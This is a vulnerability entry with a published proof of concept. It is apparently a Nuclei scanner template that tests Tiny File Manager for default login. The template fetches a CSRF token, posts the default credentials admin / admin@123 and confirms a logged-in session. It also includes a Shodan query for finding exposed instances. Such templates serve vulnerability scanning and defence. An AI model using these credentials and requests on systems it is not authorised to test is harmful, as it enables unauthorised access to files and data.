漏洞描述
Tiny File Manager contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
tiny-filemanager-default-login: Tiny File Manager - Default Login
PoC代码[已公开]
id: tiny-filemanager-default-login
info:
name: Tiny File Manager - Default Login
author: shelled
severity: high
description: Tiny File Manager contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/prasathmani/tinyfilemanager
- https://tinyfilemanager.github.io/docs/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:tinyfilemanager_project:tinyfilemanager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
shodan-query: html:"Tiny File Manager"
product: tinyfilemanager
vendor: tinyfilemanager_project
tags: default-login,tiny,filemanager,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fm_usr={{user}}&fm_pwd={{pass}}&token={{token}}
- |
GET /?p= HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
user:
- admin
pass:
- admin@123
skip-variables-check: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- 'admin'
- 'You are logged in'
- 'Tiny File Manager'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: token
part: body
regex:
- '([a-f0-9]{64})'
internal: true
# digest: 4a0a00473045022030caa45ee44e5f9068b7be963a6d66d45d71b9b520efeaf89d0bba36e8340e78022100cc7c8ce845b6537b1c576c6fb645e8a5c81b206b33f1b15da10ebcba152c513b:922c64590222798bb761d5b6d8e72950